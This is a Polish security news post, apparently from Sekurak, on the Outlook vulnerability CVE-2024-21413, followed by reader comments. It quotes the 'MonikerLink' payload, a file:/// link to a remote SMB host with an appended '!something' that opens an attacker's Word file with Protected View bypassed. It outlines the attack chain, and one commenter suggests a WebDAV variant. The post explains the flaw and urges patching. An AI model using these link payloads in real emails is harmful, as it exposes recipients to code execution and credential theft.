Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Krytyczna podatność klasy RCE (Remote Code Execution) w Outlooku. CVE-2024-21413.

14 lutego 2024, 22:03 | W biegu | komentarzy 15

Czytając ten opis od Microsoftu, można całkiem mocno się zestresować. Co my tutaj mamy?

  • RCE bez uwierzytelnienia w Outlooku
  • Niemal maksymalna krytyczność (9.8 w skali CVSS)
  • Eksploitacja nie wymaga interakcji ze strony ofiary
  • Podatność jest exploitowana w realnych atakach Aktualizacja: Microsoft zmienił podaną wcześniej przez siebie informację. Wg obecnego statusu podatność najpewniej nie jest exploitowana.

Czy wystarczy więc wysłanie do kogoś odpowiednio spreparowanego maila i Game Over? Wygląda na to, że nie jest aż tak źle. Nie jest też różowo. Nieco więcej szczegółów dostarcza świeże badanie od firmy Checkpoint. Czytamy tutaj, że umieszczenie takiego linku w mailu:

<a href=”file:///\\10.10.111.111\test\test.rtf”>CLICK ME</a>

powodowało, że jego kliknięcie przez użytkownika-ofiarę… nic nie dawało. Ale już zaopatrzenie linku w wykrzyknik oraz losowe znaki otwierało dokument MS Word (rtf):

<a href=”file:///\\10.10.111.111\test\test.rtf!something”>CLICK ME</a>

Co więcej, tak skonstruowany link otworzy plik Worda z wyłączonym Protected View.

Podsumowując, wygląda na to, że exploit wygląda tak:

  • Atakujący przesyła e-maila z linkiem do kliknięcia przez ofiarę
  • Ofiara klika linka
  • W tle otwiera się plik Worda dostarczony przez atakującego
  • Plik Worda zawiera (osobnego) exploita dającego wykonanie kodu na komputerze ofiary

Ale nie prościej wysłać po prostu zainfekowany załącznik Worda, licząc że ofiara go otworzy? Niekoniecznie – jednak kliknięcie w link jest prostsze niż otworzenie załącznika. Co więcej w przypadku załącznika, atakujący musiałby dodatkowo ominąć mechanizm Protected View (np. poprzez skłonienie ofiary do dodatkowego kliku).

Aktualizujcie się.

~ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Jakub

    Jest info ze strony Ms, które wersje Office są podatne ?

    Odpowiedz
  2. jk

    its not a bug if its an intended feature

    Odpowiedz
  3. Hans

    Pytanie,
    Czy dotyczy to ominięcia Protected View tylko wyłącznie po SMB?
    Czy dopisanie na końcu „!” po http/https tez spowoduje uruchomienie bez Protected View?

    Odpowiedz
  4. JaSam

    No to jak jest wreszcie?
    Eksploitacja nie wymaga interakcji ze strony ofiary.
    Ale w link trzeba kliknąć…

    Odpowiedz
  5. Dominik

    To w końcu nie wymaga interakcji czy trzeba kliknąć w link?

    Odpowiedz
    • Najpewniej trzeba kliknąć link, chociaż Microsoft twierdzi że nie…

      Odpowiedz
  6. Marcin

    A dopiero co tydzień temu wyłączyłem aktualizacje, bo w Outlook do paska wyszukiwania dostał się jakiś błąd i nie można było nic wyszukiwać. Znalazłem jak to naprawić i oczywiście Microsoft zalecił wyłączenie aktualizacji haha :D

    Odpowiedz
  7. Mama Adama

    Wysoka krytyczność bo znajomy zaraportował chyba.
    Ja jestem bardziej krytyczna xD

    Odpowiedz
  8. mati

    Więcej pytań niż odpowiedzi.
    Przecież guest access po SMB jest domyślnie wyłączony w windowsach? Atakujący musiałby wcześniej znać nasze hasło żeby zestawić połączenie które klient zaakceptuje (lub łamać hash NTLM w locie, co może nie jest tak całkiem niemożliwe?).
    Czy użyta funkcja fallbackuje do WebDAV, albo da się wymusić WebDav robiąc file:///\\10.10.111.111@8888\test\test.rtf!something ?

    Interesują mnie takie tematy, szkoda że nie mam z kim pogadać.

    Odpowiedz
  9. Miś uchatek

    To jest local code execution w zasadzie prawda chyba że umieścimy swój dla gdzieś u goscia appdata albo wykorzystamy coś z smb ? Bo nie chcę mi się drążyć

    Odpowiedz
  10. Miś uchatek

    Eh ten dzisiejszy marketing :/

    Odpowiedz

Odpowiedz